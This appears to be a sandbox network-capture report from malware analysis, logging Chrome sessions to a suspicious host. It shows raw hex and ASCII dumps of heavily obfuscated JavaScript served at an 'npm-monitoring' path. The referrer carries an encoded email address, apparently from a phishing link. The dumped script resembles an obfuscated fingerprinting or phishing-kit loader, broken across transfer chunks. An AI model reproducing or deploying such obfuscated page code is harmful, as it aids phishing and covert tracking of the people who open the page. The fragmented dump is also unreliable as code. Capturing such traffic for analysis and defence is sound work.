                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:49 UTC181INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:23:49 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                2024-12-05 07:23:49 UTC7100INData Raw: 31 62 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 54 35 28 54 2c 42 29 7b 76 61 72 20 6b 3d 61 30 54 34 28 29 3b 72 65 74 75 72 6e 20 61 30 54 35 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 70 29 7b 48 3d 48 2d 30 78 31 62 61 3b 76 61 72 20 66 3d 6b 5b 48 5d 3b 72 65 74 75 72 6e 20 66 3b 7d 2c 61 30 54 35 28 54 2c 42 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 30 54 34 28 29 7b 76 61 72 20 61 6a 3d 5b 27 65 73 55 6d 4a 27 2c 27 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 27 2c 27 65 6d 69 74 27 2c 27 6e 61 76 69 67 61 74 6f 72
                                                Data Ascii: 1bb4<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator
                                                2024-12-05 07:23:50 UTC16384INData Raw: 37 66 66 39 0d 0a 32 33 37 33 36 32 64 32 65 22 2c 20 22 37 39 36 65 36 32 36 65 32 35 33 37 34 36 36 63 37 39 36 32 37 37 32 35 22 2c 20 22 33 32 33 33 33 31 32 35 33 32 33 32 32 66 32 35 33 36 33 30 37 32 36 61 22 2c 20 22 37 65 36 64 32 35 33 37 34 36 32 35 33 32 33 35 33 33 32 64 32 35 33 32 22 2c 20 22 33 37 32 35 33 37 34 33 36 61 37 36 36 32 37 61 36 62 37 65 37 37 32 35 22 2c 20 22 33 32 33 30 33 39 32 35 33 32 33 37 32 35 33 32 33 35 36 63 35 38 36 65 22 2c 20 22 37 31 36 64 32 35 33 37 34 32 36 37 32 35 33 37 34 36 37 36 36 31 34 39 22 2c 20 22 34 31 34 38 36 36 35 66 36 61 36 63 37 34 37 30 36 31 36 33 37 32 32 35 22 2c 20 22 33 32 33 33 33 34 32 35 33 32 33 32 32 66 36 61 36 34 37 39 37 31 32 35 22 2c 20 22 33 35 34 33 36 61 37 36 36 32 37 61
                                                Data Ascii: 7ff9237362d2e", "796e626e2537466c79627725", "3233312532322f253630726a", "7e6d253746253235332d2532", "372537436a76627a6b7e7725", "3230392532372532356c586e", "716d25374267253746766149", "4148665f6a6c747061637225", "3233342532322f6a64797125", "35436a76627a
                                                2024-12-05 07:23:50 UTC16384INData Raw: 69 6f 6e 27 69 6e 20 48 33 29 7c 7c 76 6f 69 64 20 30 78 30 21 3d 3d 48 32 28 29 5b 48 67 28 30 78 35 37 66 29 5d 29 29 7b 76 61 72 20 48 34 3d 7b 7d 2c 48 35 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 48 6b 3d 61 72 67 75 6d 65 6e 74 73 5b 27 6c 65 6e 67 74 68 27 5d 3c 30 78 31 7c 7c 76 6f 69 64 20 30 78 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 78 30 5d 3f 76 6f 69 64 20 30 78 30 3a 6b 46 28 61 72 67 75 6d 65 6e 74 73 5b 30 78 30 5d 29 2c 48 48 3d 6b 7a 28 48 33 2c 74 68 69 73 29 3f 6e 65 77 20 48 32 28 48 6b 29 3a 76 6f 69 64 20 30 78 30 3d 3d 3d 48 6b 3f 48 32 28 29 3a 48 32 28 48 6b 29 3b 72 65 74 75 72 6e 27 27 3d 3d 3d 48 6b 26 26 28 48 34 5b 48 48 5d 3d 21 30 78 30 29 2c 48 48 3b 7d 3b 48 31 28 48 35 2c 48 32 29 2c 48 35 5b 27 70 72 6f 74
                                                Data Ascii: ion'in H3)||void 0x0!==H2()[Hg(0x57f)])){var H4={},H5=function(){var Hk=arguments['length']<0x1||void 0x0===arguments[0x0]?void 0x0:kF(arguments[0x0]),HH=kz(H3,this)?new H2(Hk):void 0x0===Hk?H2():H2(Hk);return''===Hk&&(H4[HH]=!0x0),HH;};H1(H5,H2),H5['prot
                                                2024-12-05 07:23:50 UTC16384INData Raw: 0a 63 30 30 30 0d 0a 63 3d 21 30 78 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6b 71 2c 6b 4a 29 7b 69 66 28 6b 63 29 72 65 74 75 72 6e 20 6b 63 3d 21 30 78 31 2c 6b 4a 3b 69 66 28 6b 61 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 6b 4a 3b 66 6f 72 28 76 61 72 20 6b 47 3d 30 78 30 3b 6b 47 3c 6b 79 3b 6b 47 2b 2b 29 69 66 28 6b 6f 5b 6b 47 5d 3d 3d 3d 6b 71 29 72 65 74 75 72 6e 20 6b 4a 3b 7d 3b 7d 7d 7d 65 6c 73 65 20 54 76 28 54 79 2c 54 5a 2c 54 55 29 5b 66 36 28 30 78 32 34 39 29 5d 28 54 45 5b 27 72 65 73 6f 6c 76 65 27 5d 2c 54 52 29 3b 7d 3b 7d 2c 30 78 61 30 34 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 66 37 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 31 66 62 38 29 2c 6b 61 3d 6b 5a 28 30 78 31 37 35 66 29 3b
                                                Data Ascii: c000c=!0x0;return function(kq,kJ){if(kc)return kc=!0x1,kJ;if(ka(this))return kJ;for(var kG=0x0;kG<ky;kG++)if(ko[kG]===kq)return kJ;};}}}else Tv(Ty,TZ,TU)[f6(0x249)](TE['resolve'],TR);};},0xa04:function(km,kb,kZ){var f7=a0T5,kY=kZ(0x1fb8),ka=kZ(0x175f);
                                                2024-12-05 07:23:50 UTC16384INData Raw: 20 6b 65 2c 6b 4e 3d 6b 75 28 6b 6f 29 2c 6b 79 3d 6b 4d 28 6b 6f 29 2c 6b 63 3d 6b 79 5b 27 6c 65 6e 67 74 68 27 5d 2c 6b 4b 3d 30 78 30 3b 6b 63 3e 6b 4b 3b 29 6b 55 5b 27 66 27 5d 28 6b 73 2c 6b 65 3d 6b 79 5b 6b 4b 2b 2b 5d 2c 6b 4e 5b 6b 65 5d 29 3b 72 65 74 75 72 6e 20 6b 73 3b 7d 3b 7d 7d 2c 30 78 31 36 63 62 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 57 75 3d 61 30 54 35 3b 69 66 28 57 75 28 30 78 34 37 64 29 3d 3d 3d 57 75 28 30 78 34 37 64 29 29 7b 76 61 72 20 6b 59 3d 6b 5a 28 30 78 31 37 65 29 2c 6b 61 3d 6b 5a 28 30 78 37 30 37 29 2c 6b 55 3d 6b 5a 28 30 78 66 33 38 29 2c 6b 56 3d 6b 5a 28 30 78 38 66 35 29 2c 6b 75 3d 6b 5a 28 30 78 65 65 37 29 2c 6b 4d 3d 54 79 70 65 45 72 72 6f 72 2c 6b 69 3d 4f 62 6a 65 63 74
                                                Data Ascii: ke,kN=ku(ko),ky=kM(ko),kc=ky['length'],kK=0x0;kc>kK;)kU['f'](ks,ke=ky[kK++],kN[ke]);return ks;};}},0x16cb:function(km,kb,kZ){var Wu=a0T5;if(Wu(0x47d)===Wu(0x47d)){var kY=kZ(0x17e),ka=kZ(0x707),kU=kZ(0xf38),kV=kZ(0x8f5),ku=kZ(0xee7),kM=TypeError,ki=Object
                                                2024-12-05 07:23:50 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 49 76 3d 49 43 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 6e 65 77 20 6b 72 28 6b 68 29 5b 49 76 28 30 78 34 62 39 29 5d 28 29 7c 7c 30 78 31 21 3d 3d 6b 68 5b 49 76 28 30 78 33 65 36 29 5d 5b 49 76 28 30 78 34 62 39 29 5d 5b 49 76 28 30 78 32 65 38 29 5d 28 7b 27 74 6f 49 53 4f 53 74 72 69 6e 67 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 78 31 3b 7d 7d 29 3b 7d 29 7d 2c 7b 27 74 6f 4a 53 4f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 6b 46 29 7b 76 61 72 20 49 50 3d 49 43 2c 48 30 3d 6b 68 28 74 68 69 73 29 2c 48 31 3d 6b 7a 28 48 30 2c 49 50 28 30 78 34 32 31 29 29 3b 72 65 74 75 72 6e 20 49 50 28 30 78 34 32 31 29 21 3d 74 79 70 65 6f 66 20 48 31 7c 7c 6b 72 28 48 31 29 3f 48 30 5b 49 50 28
                                                Data Ascii: (function(){var Iv=IC;return null!==new kr(kh)[Iv(0x4b9)]()||0x1!==kh[Iv(0x3e6)][Iv(0x4b9)][Iv(0x2e8)]({'toISOString':function(){return 0x1;}});})},{'toJSON':function(kF){var IP=IC,H0=kh(this),H1=kz(H0,IP(0x421));return IP(0x421)!=typeof H1||kr(H1)?H0[IP(
                                                2024-12-05 07:23:50 UTC9INData Raw: 6e 63 74 69 6f 6e 28 0d 0a
                                                Data Ascii: nction(
                                                2024-12-05 07:23:50 UTC16384INData Raw: 38 30 30 30 0d 0a 29 7b 76 61 72 20 6d 45 3d 6d 51 2c 6b 63 3d 6b 55 28 6b 73 5b 6d 45 28 30 78 35 31 36 29 5d 29 2c 6b 4b 3d 5b 5d 2c 6b 71 3d 30 78 30 2c 6b 4a 3d 30 78 31 3b 6b 4d 28 6b 69 2c 66 75 6e 63 74 69 6f 6e 28 6b 47 29 7b 76 61 72 20 6d 6a 3d 6d 45 3b 69 66 28 6d 6a 28 30 78 35 31 31 29 21 3d 3d 6d 6a 28 30 78 34 35 30 29 29 7b 76 61 72 20 6b 43 3d 6b 71 2b 2b 2c 6b 76 3d 21 30 78 31 3b 6b 4a 2b 2b 2c 6b 61 28 6b 63 2c 6b 73 2c 6b 47 29 5b 6d 6a 28 30 78 32 34 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6b 50 29 7b 6b 76 7c 7c 28 6b 76 3d 21 30 78 30 2c 6b 4b 5b 6b 43 5d 3d 6b 50 2c 2d 2d 6b 4a 7c 7c 6b 65 28 6b 4b 29 29 3b 7d 2c 6b 4e 29 3b 7d 65 6c 73 65 7b 76 61 72 20 6b 4c 2c 6b 51 2c 6b 45 2c 6b 6a 2c 6b 78 2c 6b 52 3d 54 5a 28 74 68 69 73 29
                                                Data Ascii: 8000){var mE=mQ,kc=kU(ks[mE(0x516)]),kK=[],kq=0x0,kJ=0x1;kM(ki,function(kG){var mj=mE;if(mj(0x511)!==mj(0x450)){var kC=kq++,kv=!0x1;kJ++,ka(kc,ks,kG)[mj(0x249)](function(kP){kv||(kv=!0x0,kK[kC]=kP,--kJ||ke(kK));},kN);}else{var kL,kQ,kE,kj,kx,kR=TZ(this)
                                                2024-12-05 07:23:50 UTC16384INData Raw: 2c 30 78 31 32 35 64 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 62 4a 3d 61 30 54 35 3b 6b 5a 28 30 78 31 65 61 39 29 28 62 4a 28 30 78 35 37 39 29 29 3b 7d 2c 30 78 32 34 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 62 47 3d 61 30 54 35 3b 69 66 28 62 47 28 30 78 32 31 62 29 3d 3d 3d 62 47 28 30 78 32 65 63 29 29 72 65 74 75 72 6e 20 54 58 28 54 6d 28 54 70 5b 62 47 28 30 78 34 62 62 29 5d 29 2c 76 6f 69 64 20 30 78 30 29 3b 65 6c 73 65 20 6b 5a 28 30 78 31 35 34 33 29 2c 6b 5a 28 30 78 39 62 34 29 2c 6b 5a 28 30 78 37 36 36 29 2c 6b 5a 28 30 78 31 38 32 38 29 2c 6b 5a 28 30 78 31 65 62 33 29 3b 7d 2c 30 78 37 36 36 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 62 43
                                                Data Ascii: ,0x125d:function(km,kb,kZ){var bJ=a0T5;kZ(0x1ea9)(bJ(0x579));},0x2459:function(km,kb,kZ){var bG=a0T5;if(bG(0x21b)===bG(0x2ec))return TX(Tm(Tp[bG(0x4bb)]),void 0x0);else kZ(0x1543),kZ(0x9b4),kZ(0x766),kZ(0x1828),kZ(0x1eb3);},0x766:function(km,kb,kZ){var bC
                                                2024-12-05 07:23:50 UTC8INData Raw: 2c 54 6b 28 6b 5a 0d 0a
                                                Data Ascii: ,Tk(kZ


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549789164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:51 UTC696OUTGET /4.5.1/npm-monitoring HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:51 UTC181INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:23:51 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                2024-12-05 07:23:51 UTC16203INData Raw: 37 30 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 54 35 28 54 2c 42 29 7b 76 61 72 20 6b 3d 61 30 54 34 28 29 3b 72 65 74 75 72 6e 20 61 30 54 35 3d 66 75 6e 63 74 69 6f 6e 28 48 2c 70 29 7b 48 3d 48 2d 30 78 31 62 61 3b 76 61 72 20 66 3d 6b 5b 48 5d 3b 72 65 74 75 72 6e 20 66 3b 7d 2c 61 30 54 35 28 54 2c 42 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 30 54 34 28 29 7b 76 61 72 20 61 6a 3d 5b 27 65 73 55 6d 4a 27 2c 27 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 27 2c 27 65 6d 69 74 27 2c 27 6e 61 76 69 67 61 74 6f 72
                                                Data Ascii: 708c<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator
                                                2024-12-05 07:23:51 UTC12617INData Raw: 27 42 69 74 73 74 72 65 61 6d 5c 78 32 30 56 65 72 61 5c 78 32 30 53 61 6e 73 5c 78 32 30 4d 6f 6e 6f 27 2c 27 77 65 62 6b 69 74 4f 66 66 6c 69 6e 65 41 75 64 69 6f 43 6f 6e 74 65 78 74 27 2c 27 61 62 6f 75 74 3a 62 6c 61 6e 6b 27 2c 27 43 4b 77 47 6e 27 2c 27 4c 75 63 69 64 61 5c 78 32 30 53 61 6e 73 27 5d 3b 61 30 54 34 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6a 3b 7d 3b 72 65 74 75 72 6e 20 61 30 54 34 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 54 2c 42 29 7b 76 61 72 20 48 4b 3d 61 30 54 35 2c 6b 3d 54 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 48 3d 70 61 72 73 65 49 6e 74 28 48 4b 28 30 78 32 61 66 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 48 4b 28 30 78 33 36 63 29 29 2f 30 78 32 2b 2d 70 61 72
                                                Data Ascii: 'Bitstream\x20Vera\x20Sans\x20Mono','webkitOfflineAudioContext','about:blank','CKwGn','Lucida\x20Sans'];a0T4=function(){return aj;};return a0T4();}(function(T,B){var HK=a0T5,k=T();while(!![]){try{var H=parseInt(HK(0x2af))/0x1+-parseInt(HK(0x36c))/0x2+-par
                                                2024-12-05 07:23:51 UTC16384INData Raw: 66 66 66 39 0d 0a 65 2c 6b 73 29 2c 6b 73 5b 27 67 6c 6f 62 61 6c 27 5d 29 6b 6f 3f 6b 75 5b 6b 4d 5d 3d 6b 69 3a 6b 56 28 6b 4d 2c 6b 69 29 3b 65 6c 73 65 7b 74 72 79 7b 6b 73 5b 70 6d 28 30 78 32 39 62 29 5d 3f 6b 75 5b 6b 4d 5d 26 26 28 6b 6f 3d 21 30 78 30 29 3a 64 65 6c 65 74 65 20 6b 75 5b 6b 4d 5d 3b 7d 63 61 74 63 68 28 6b 4e 29 7b 7d 6b 6f 3f 6b 75 5b 6b 4d 5d 3d 6b 69 3a 6b 61 5b 27 66 27 5d 28 6b 75 2c 6b 4d 2c 7b 27 76 61 6c 75 65 27 3a 6b 69 2c 27 65 6e 75 6d 65 72 61 62 6c 65 27 3a 21 30 78 31 2c 27 63 6f 6e 66 69 67 75 72 61 62 6c 65 27 3a 21 6b 73 5b 70 6d 28 30 78 32 37 30 29 5d 2c 27 77 72 69 74 61 62 6c 65 27 3a 21 6b 73 5b 70 6d 28 30 78 32 65 65 29 5d 7d 29 3b 7d 72 65 74 75 72 6e 20 6b 75 3b 7d 3b 7d 2c 30 78 38 32 66 3a 66 75 6e 63
                                                Data Ascii: fff9e,ks),ks['global'])ko?ku[kM]=ki:kV(kM,ki);else{try{ks[pm(0x29b)]?ku[kM]&&(ko=!0x0):delete ku[kM];}catch(kN){}ko?ku[kM]=ki:ka['f'](ku,kM,{'value':ki,'enumerable':!0x1,'configurable':!ks[pm(0x270)],'writable':!ks[pm(0x2ee)]});}return ku;};},0x82f:func
                                                2024-12-05 07:23:51 UTC16384INData Raw: 30 78 32 64 66 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 66 50 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 36 61 38 29 3b 6b 6d 5b 66 50 28 30 78 33 61 65 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 61 29 7b 72 65 74 75 72 6e 20 6b 59 28 6b 61 29 7c 7c 6e 75 6c 6c 3d 3d 3d 6b 61 3b 7d 3b 7d 2c 30 78 32 35 35 35 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 29 7b 76 61 72 20 66 4c 3d 61 30 54 35 3b 6b 6d 5b 66 4c 28 30 78 33 61 65 29 5d 3d 21 30 78 31 3b 7d 2c 30 78 35 38 66 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 66 51 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 35 38 31 29 2c 6b 61 3d 6b 5a 28 30 78 35 63 62 29 2c 6b 55 3d 6b 5a 28 30 78 31 32 63 66 29 2c 6b 56 3d 6b 5a 28 30 78 31 33 39 65 29 2c 6b 75 3d 4f 62
                                                Data Ascii: 0x2df:function(km,kb,kZ){var fP=a0T5,kY=kZ(0x6a8);km[fP(0x3ae)]=function(ka){return kY(ka)||null===ka;};},0x2555:function(km){var fL=a0T5;km[fL(0x3ae)]=!0x1;},0x58f:function(km,kb,kZ){var fQ=a0T5,kY=kZ(0x581),ka=kZ(0x5cb),kU=kZ(0x12cf),kV=kZ(0x139e),ku=Ob
                                                2024-12-05 07:23:51 UTC16384INData Raw: 28 30 78 32 32 30 29 5d 3b 7d 2c 30 78 38 37 63 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 6b 59 3d 6b 5a 28 30 78 38 66 35 29 2c 6b 61 3d 6b 5a 28 30 78 36 61 38 29 2c 6b 55 3d 6b 5a 28 30 78 34 39 35 29 3b 6b 6d 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 56 2c 6b 75 29 7b 76 61 72 20 57 64 3d 61 30 54 35 3b 69 66 28 6b 59 28 6b 56 29 2c 6b 61 28 6b 75 29 26 26 6b 75 5b 57 64 28 30 78 32 64 35 29 5d 3d 3d 3d 6b 56 29 72 65 74 75 72 6e 20 6b 75 3b 76 61 72 20 6b 4d 3d 6b 55 5b 27 66 27 5d 28 6b 56 29 3b 72 65 74 75 72 6e 28 30 78 30 2c 6b 4d 5b 57 64 28 30 78 35 31 36 29 5d 29 28 6b 75 29 2c 6b 4d 5b 57 64 28 30 78 35 62 32 29 5d 3b 7d 3b 7d 2c 30 78 35 37 66 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62
                                                Data Ascii: (0x220)];},0x87c:function(km,kb,kZ){var kY=kZ(0x8f5),ka=kZ(0x6a8),kU=kZ(0x495);km['exports']=function(kV,ku){var Wd=a0T5;if(kY(kV),ka(ku)&&ku[Wd(0x2d5)]===kV)return ku;var kM=kU['f'](kV);return(0x0,kM[Wd(0x516)])(ku),kM[Wd(0x5b2)];};},0x57f:function(km,kb
                                                2024-12-05 07:23:52 UTC16384INData Raw: 78 36 61 38 29 2c 6b 56 3d 54 70 2c 6b 75 3d 54 76 3b 54 79 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 4d 29 7b 76 61 72 20 6d 6b 3d 6d 42 3b 69 66 28 6b 55 28 6b 4d 29 29 72 65 74 75 72 6e 20 6b 4d 3b 74 68 72 6f 77 20 6e 65 77 20 6b 75 28 6b 56 28 6b 4d 29 2b 6d 6b 28 30 78 33 39 61 29 29 3b 7d 3b 7d 65 6c 73 65 7b 76 61 72 20 6b 59 3d 6b 5a 28 30 78 31 29 3b 6b 62 5b 27 66 27 5d 3d 6b 59 3b 7d 7d 2c 30 78 31 3a 66 75 6e 63 74 69 6f 6e 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 76 61 72 20 6d 48 3d 61 30 54 35 2c 6b 59 3d 6b 5a 28 30 78 31 35 63 61 29 2c 6b 61 3d 6b 5a 28 30 78 31 63 35 37 29 2c 6b 55 3d 6b 5a 28 30 78 31 36 37 62 29 2c 6b 56 3d 6b 5a 28 30 78 37 34 61 29 2c 6b 75 3d 6b 5a 28 30 78 31 37 38 64 29 2c 6b 4d 3d 6b 5a 28 30 78
                                                Data Ascii: x6a8),kV=Tp,ku=Tv;Ty['exports']=function(kM){var mk=mB;if(kU(kM))return kM;throw new ku(kV(kM)+mk(0x39a));};}else{var kY=kZ(0x1);kb['f']=kY;}},0x1:function(km,kb,kZ){var mH=a0T5,kY=kZ(0x15ca),ka=kZ(0x1c57),kU=kZ(0x167b),kV=kZ(0x74a),ku=kZ(0x178d),kM=kZ(0x
                                                2024-12-05 07:23:52 UTC16384INData Raw: 0a 38 30 30 30 0d 0a 27 3a 6e 65 77 20 6b 51 28 29 2c 27 72 65 6a 65 63 74 69 6f 6e 27 3a 21 30 78 31 2c 27 73 74 61 74 65 27 3a 30 78 30 2c 27 76 61 6c 75 65 27 3a 76 6f 69 64 20 30 78 30 7d 29 3b 7d 29 5b 6d 6c 28 30 78 33 65 36 29 5d 3d 6b 6f 28 6b 72 2c 27 74 68 65 6e 27 2c 66 75 6e 63 74 69 6f 6e 28 48 48 2c 48 70 29 7b 76 61 72 20 62 33 3d 6d 6c 2c 48 66 3d 6b 67 28 74 68 69 73 29 2c 48 57 3d 6b 46 28 6b 47 28 74 68 69 73 2c 6b 53 29 29 3b 72 65 74 75 72 6e 20 48 66 5b 62 33 28 30 78 32 34 32 29 5d 3d 21 30 78 30 2c 48 57 5b 27 6f 6b 27 5d 3d 21 6b 4b 28 48 48 29 7c 7c 48 48 2c 48 57 5b 62 33 28 30 78 34 37 36 29 5d 3d 6b 4b 28 48 70 29 26 26 48 70 2c 48 57 5b 62 33 28 30 78 34 66 65 29 5d 3d 6b 4d 3f 6b 7a 5b 27 64 6f 6d 61 69 6e 27 5d 3a 76 6f 69
                                                Data Ascii: 8000':new kQ(),'rejection':!0x1,'state':0x0,'value':void 0x0});})[ml(0x3e6)]=ko(kr,'then',function(HH,Hp){var b3=ml,Hf=kg(this),HW=kF(kG(this,kS));return Hf[b3(0x242)]=!0x0,HW['ok']=!kK(HH)||HH,HW[b3(0x476)]=kK(Hp)&&Hp,HW[b3(0x4fe)]=kM?kz['domain']:voi
                                                2024-12-05 07:23:52 UTC16384INData Raw: 61 72 20 62 72 3d 62 64 3b 72 65 74 75 72 6e 21 21 6b 6d 26 26 62 72 28 30 78 33 37 61 29 3d 3d 74 79 70 65 6f 66 20 6b 6d 5b 62 72 28 30 78 32 34 39 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 54 70 28 6b 6d 2c 6b 62 29 7b 76 61 72 20 62 41 3d 62 64 3b 74 72 79 7b 76 61 72 20 6b 5a 3d 6b 6d 28 29 3b 54 48 28 6b 5a 29 3f 6b 5a 5b 62 41 28 30 78 32 34 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6b 59 29 7b 72 65 74 75 72 6e 20 6b 62 28 21 30 78 30 2c 6b 59 29 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 6b 59 29 7b 72 65 74 75 72 6e 20 6b 62 28 21 30 78 31 2c 6b 59 29 3b 7d 29 3a 6b 62 28 21 30 78 30 2c 6b 5a 29 3b 7d 63 61 74 63 68 28 6b 59 29 7b 6b 62 28 21 30 78 31 2c 6b 59 29 3b 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 66 28 6b 6d 2c 6b 62 2c 6b 5a 29 7b 72 65 74 75 72 6e 20
                                                Data Ascii: ar br=bd;return!!km&&br(0x37a)==typeof km[br(0x249)];}function Tp(km,kb){var bA=bd;try{var kZ=km();TH(kZ)?kZ[bA(0x249)](function(kY){return kb(!0x0,kY);},function(kY){return kb(!0x1,kY);}):kb(!0x0,kZ);}catch(kY){kb(!0x1,kY);}}function Tf(km,kb,kZ){return
                                                2024-12-05 07:23:52 UTC9INData Raw: 45 28 30 78 35 61 37 0d 0a
                                                Data Ascii: E(0x5a7
                                                2024-12-05 07:23:52 UTC16384INData Raw: 39 62 35 35 0d 0a 29 5d 28 6b 6d 2c 27 29 27 29 29 5b 5a 45 28 30 78 32 64 65 29 5d 3b 65 6c 73 65 7b 76 61 72 20 6b 5a 3d 7b 7d 3b 6b 5a 5b 54 58 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 27 6e 65 78 74 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 27 64 6f 6e 65 27 3a 54 79 3d 21 30 78 30 7d 3b 7d 7d 3b 7d 2c 54 70 28 6b 5a 29 3b 7d 7d 76 61 72 20 42 37 3d 4d 61 74 68 2c 42 38 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 78 30 3b 7d 2c 42 39 3d 7b 27 64 65 66 61 75 6c 74 27 3a 5b 5d 2c 27 61 70 70 6c 65 27 3a 5b 7b 27 66 6f 6e 74 27 3a 62 64 28 30 78 35 33 35 29 7d 5d 2c 27 73 65 72 69 66 27 3a 5b 7b 27 66 6f 6e 74 46 61 6d 69 6c 79 27 3a 62 64 28 30 78 33 63 32 29 7d 5d 2c 27 73 61 6e 73 27 3a 5b 7b 27 66
                                                Data Ascii: 9b55)](km,')'))[ZE(0x2de)];else{var kZ={};kZ[TX]=function(){return{'next':function(){return{'done':Ty=!0x0};}};},Tp(kZ);}}var B7=Math,B8=function(){return 0x0;},B9={'default':[],'apple':[{'font':bd(0x535)}],'serif':[{'fontFamily':bd(0x3c2)}],'sans':[{'f


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549801164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:53 UTC376OUTGET /4.5.1/npm-monitoring HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
